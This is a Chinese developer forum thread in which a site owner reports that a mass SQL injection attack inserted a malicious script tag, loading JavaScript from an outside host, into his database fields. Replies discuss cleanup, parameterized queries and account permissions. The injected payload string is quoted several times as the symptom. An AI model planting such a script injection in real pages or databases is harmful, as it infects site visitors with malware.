各位大哥:我的站今天浏览网页时提示要装realplayer,诺顿警告是病毒,请高手解决。

各位高手:
    我今天在浏览我的网站网页,提示要装realplayer,诺顿警告是病毒。
    且网页上显示有一些多余的代码(是乱码)。
    我查看了一个数据库里面的记录发现某些字段里面增加了一些内容。比如:我的字段本来的内容是ads/20070308172819319.jpg">,结果现在好多都变成了ads/20070308172819319.jpg"></t"></title><script src=http://s.see9.us/s.js></script><!--    请各位同仁帮我出出办法。 鄙视那些小人行为。
    我的程序是ASP.NET(C#),数据库是MS-SQL,服务器系统是Win2003
   

解决方案 »

  1.   

    <script src=http://s.see9.us/s.js></script>这个是JS木马, 我也中过, 你需要安装好一点的杀毒软件, 然后使用文本替换工具将这段代码去掉即可
      

  2.   

    像这种写法会不会以有注入攻击SqlCommand Inscom = new SqlCommand("insert into tc_advertise (ta_title,ta_filename,ta_links,ta_scrolltype,ta_order) values (@ta_title,@ta_filename,@ta_links,@ta_scrolltype,@ta_order)",MyCls.SqlConn);
    Inscom.Parameters.Add("@ta_title",txttitle.Text.Trim());
    Inscom.Parameters.Add("@ta_filename",Filenames);
    Inscom.Parameters.Add("@ta_links",txtlink.Text.Trim());//txtlink.Text.Trim().Substring(0,7).ToLower()=="http://"?txtlink.Text.Trim():"http://" + txtlink.Text.Trim()
    Inscom.Parameters.Add("@ta_scrolltype",Request["scroll"].ToString());
    Inscom.Parameters.Add("@ta_order",DrpOrder.SelectedValue); Inscom.ExecuteNonQuery();
      

  3.   

    parameter 会自动将一些不安全的字符过滤掉
      

  4.   

    高手帮说个办法:我的网站数据库记录里现在有好外已出现了ads/20070308172819319.jpg"></t"></title><script src=http://s.see9.us/s.js></script><!--这些代码,有什么好办法将它取掉。因为我要是恢复到以前的备份时,网站前面几天加的资料都百加了。
      

  5.   

    我昨天将以前备份的数据恢愎了。今天又被小人插入了乱码。如:
    ads/20070308172819319.jpg"></t"></title><script src=http://s.see9.us/s.js></script><!--请问各位高手有何良策?
      

  6.   

    最近爆发病毒,专门攻击SqlServer 服务器.苹果(中国),华军,辽宁电信也中招了.如果你还没有搞清楚病毒专门进来.把Sqlserver账号权限改为只读算了.
      

  7.   

    中国互联网近日遭受大范围SQL注入攻击
    看样子我的网站也是一个受害者。 
      

  8.   

    Safe3IF v2.0 完全免费的IIS防护软件 
    http://www.cnblogs.com/Safe3/archive/2008/05/28/1209334.html
      

  9.   

    经确认是SQL注入攻击。
    现在问题已解决。